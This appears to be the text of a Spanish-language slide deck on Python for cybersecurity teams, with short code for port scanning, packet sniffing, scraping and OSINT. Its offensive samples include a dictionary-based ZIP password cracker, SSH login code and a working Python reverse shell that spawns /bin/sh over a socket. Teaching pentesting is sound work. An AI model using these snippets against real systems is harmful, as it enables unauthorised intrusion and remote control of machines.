www.sti-innsbruck.at Python para equipos de ciberseguridad @jmortegac

About me 2 http://jmortega.github.io/

About me 3 https://www.youtube.com/c/JoseManuelOrtegadev/

Books 4 ● Introducción al desarrollo seguro ● Aspectos fundamentales de desarrollo seguro ● Herramientas OWASP ● Seguridad en aplicaciones Android ● Seguridad en proyectos NodeJS ● Seguridad en proyectos Python ● Análisis estático y dinámico en aplicaciones C/C++ ● Metodologías de desarrollo

Books 5

Formación 6 https://www.adrformacion.com/cursos/pythonseg/pythonseg.html

Agenda • Introducción a Python para proyectos de ciberseguridad • Herramientas de pentesting • Herramientas Python desde el punto de vista defensivo • Herramientas Python desde el punto de vista ofensivo 7

Python para proyectos de ciberseguridad 8 1. Diseñado para la creación rápida de prototipos 2. Estructura simple y limpia, mejora la legibilidad y facilidad de uso. 3. Amplia biblioteca, también facilidad de interconexión 4. Ampliamente adoptado, la mayoría de las distribuciones de Linux lo instalan por defecto.

Python para proyectos de ciberseguridad 9

Herramientas de pentesting 10 import boto3 aws_access_key_id = '' aws_secret_access_key = '' region_name = 'ap-southeast-2' session = boto3.session.Session(aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, region_name=region_name) ec2client = session.client('ec2') client_instance = ec2client.run_instances( ImageId='ami-30041c53', KeyName='Keys', MinCount=1, MaxCount=1, InstanceType='t2.micro') https://aws.amazon.com/es/sdk-for-python/

Herramientas de pentesting 11

Herramientas de pentesting 12 import re input_ip = input('Enter the ip:') flag = 0 pattern = "^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$" match = re.match(pattern, input_ip) if (match): field = input_ip.split(".") for i in range(0, len(field)): if (int(field[i]) < 256): flag += 1 else: flag = 0 if (flag == 4): print("valid ip") else: print('No match for ip or not a valid ip') https://docs.python.org/3/library/re.html

Herramientas de pentesting 13

Herramientas de pentesting 14 import nmap nma = nmap.PortScannerAsync() def callback_function(host, scan_result): print('RESULTADO ==>') print(host, scan_result) nma.scan(hosts='127.0.0.1', arguments='-sC -Pn', callback=callback_function) while nma.still_scanning(): print("Esperando a que termine el escaneo ...") nma.wait(2) https://pypi.org/project/python-nmap/

Basic Networking 15

Port Scanning 16

Port Scanning 17

Port Scanning 18 import socket from concurrent import futures def check_port(targetIp, portNumber, timeout): TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) TCPsock.settimeout(timeout) try: TCPsock.connect((targetIp, portNumber)) return (portNumber) except: return def port_scanner(targetIp, timeout): threadPoolSize = 500 portsToCheck = 10000 executor = futures.ThreadPoolExecutor(max_workers=threadPoolSize) checks = [ executor.submit(check_port, targetIp, port, timeout) for port in range(0, portsToCheck, 1) ] for response in futures.as_completed(checks): if (response.result()): print('Listening on port: {}'.format(response.result()))

Port Scanning 19

Banner Grabing 20

Scraping 21 ● Requests ○ https://docs.python-requests.org/en/master ○ Peticiones HTTP ● BeautifulSoup ○ https://www.crummy.com/software/BeautifulSou p/bs4/doc ○ Parser XML,HTML ● Scrapy ○ https://scrapy.org ○ Framework de scraping

Scraping 22 #!/bin/python from bs4 import BeautifulSoup import requests url = input("Enter a website to extract the URL's from: ") response = requests.get("http://" +url) data = response.text soup = BeautifulSoup(data) for link in soup.find_all('a'): print(link.get('href'))

Scrapy 23

Extracción de subdominios 24 ● https://github.com/1N3/BlackWidow

OSINT 25 ● Recon-ng ○ https://github.com/lanmaster53/recon-ng ○ Framework para realizar reconocimientos basados en web. ● Belati ○ https://github.com/aancw/Belati ○ Recopilación de datos y documentos públicos y del sitio web y otros servicios. ● Pwndb ○ https://github.com/davidtavarez/pwndb ○ Buscar credenciales filtradas

wig - WebApp Information Gatherer 26

wig - WebApp Information Gatherer 27

Belati 28

Belati 29

Reconspider 30 ● https://github.com/bhavsec/reconspider

Reconspider 31

SpiderFoot 32

RED TEAM vs BLUE TEAM 33

SQLMap 34 ● https://sqlmap.org

SQLMap 35

PwnXSS 36

Fuzzing 37 ● Wfuzz ○ https://github.com/xmendez/wfuzz/ ○ Web fuzzer framework ● Pyfuzz ○ https://github.com/AyoobAli/pyfuzz ○ Fuzzing para descubrir archivos / directorios ocultos

Fuxi Scanner 38 ● https://github.com/jeffzh3ng/fuxi

Fuxi Scanner 39

Sniffing de paquetes 40 import socket import struct def ethernet_frame(data): dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', data[:14]) return format_mac_addr(dest_mac), format_mac_addr(src_mac), socket.htons(proto), data[14:] def format_mac_addr(bytes_addr): bytes_str = map('{:02x}'.format, bytes_addr) return ':'.join(bytes_str).upper() def main(): conn = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3)) while True: raw_data, addr = conn.recvfrom(65535) dest_mac, src_mac, eth_proto, data = ethernet_frame(raw_data) if eth_proto == 8: print('\nEthernet Frame:') print('Destination: {}, Source: {}, Protocol: {}'.format(dest_mac, src_mac, eth_proto)) print(data) if __name__ == "__main__": main()

Manipulación de paquetes 41 ● Scapy ○ https://scapy.net ○ Manipulación y decodificación de paquetes. ○ Enviar, rastrear, diseccionar y falsificar paquetes de red.

Manipulación de paquetes 42 from scapy.all import * packetCount = 0 def customAction(packet): global packetCount packetCount += 1 return "{}) {} → {}".format(packetCount, packet[0][1].src, packet[0][1].dst) ## Setup sniff, filtering for IP traffic sniff(filter="ip",prn=customAction)

Manipulación de paquetes 43 from scapy.all import ICMP from scapy.all import IP from scapy.all import sr1 from scapy.all import ls if __name__ == "__main__": dest_ip = "www.google.com" ip_layer = IP(dst = dest_ip) print(ls(ip_layer)) # displaying complete layer info # accessing the fields print("Destination = ", ip_layer.dst) print("Summary = ",ip_layer.summary())

Sniffing de paquetes 44 from scapy.all import * def main(): sniff(prn=http_header, filter="tcp port 80") def http_header(packet): http_packet=str(packet) if http_packet.find('GET'): return print_packet(packet) def print_packet(packet1): ret = "-------------------------------[ Received Packet ] -------------------------------\n" ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n")) ret += "---------------------------------------------------------------------------------\n" return ret if __name__ == '__main__': main()

Explotación 45 ● Pacu ○ https://github.com/RhinoSecurityLabs/pacu ○ Framework de explotación de AWS ● AWS Pwn ○ https://github.com/dagrz/aws_pwn ○ Colección de scripts de pruebas de penetración de AWS

Explotación 46 ● CrackMapExec ○ https://github.com/byt3bl33d3r/CrackMapExec ○ Mapeo de la red, obtiene credenciales y ejecuta comandos. ● DeathStar ○ https://github.com/byt3bl33d3r/DeathStar ■ Permite automatizar la escalada de privilegios en un entorno Active Directory.

Password cracking 47 import zipfile import time encrypted_filename= "secret_file.zip" zFile = zipfile.ZipFile(encrypted_filename, "r") passFile = open("passwords.txt", "r") for line in passFile.readlines(): test_password = line.strip("\n").encode('utf-8') try: print(test_password) zFile.extractall(pwd=test_password) print("Match found") break except Exception as err: pass

SSH brute force 48 import paramiko ssh = paramiko.SSHClient() ssh.load_system_host_keys() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(‘127.0.0.1', username=‘user', password=‘password') stdin,stdout,stderr = ssh.exec_command("uname -a")

SSH brute force 49

Ejecución de procesos 50 https://docs.python.org/3/library/subprocess.html import subprocess subprocess.run('ls -la', shell=True) subprocess.run(['ls', '-la'])

Ejecución de procesos 51 https://docs.python.org/3/library/subprocess.html import subprocess process = subprocess.run(['which', 'python3'], capture_output=True) if process.returncode != 0: raise OSError('Sorry python3 is not installed') python_bin = process.stdout.strip() print(f'Python found in: {python_bin}') CompletedProcess(args=['which', 'python3'], returncode=0, stdout=b'/usr/bin/python3\n', stderr=b'')

Ejecución de procesos 52 https://docs.python.org/3/library/subprocess.html from pathlib import Path import subprocess source = Path("/home/linux") cmd = ["ls", "-l", source] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE) stdout, stderr = proc.communicate() print(stdout.decode("utf-8").split('\n')[:-1])

Shell inversa 53

Shell inversa 54 #!/usr/bin/python import socket import subprocess import os sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("127.0.0.1", 45679)) os.dup2(sock.fileno(),0) os.dup2(sock.fileno(),1) os.dup2(sock.fileno(),2) shell_remote = subprocess.call(["/bin/sh", "-i"]) #proc = subprocess.call(["/bin/ls", "-i"])

Books 55

Books 56 https://github.com/PacktPublis hing/Python-Ethical-Hacking https://github.com/PacktPub lishing/Python-for-Offensive -PenTest

GitHub repository 57 https://github.com/jmortega/python_ciberseguridad_2021

58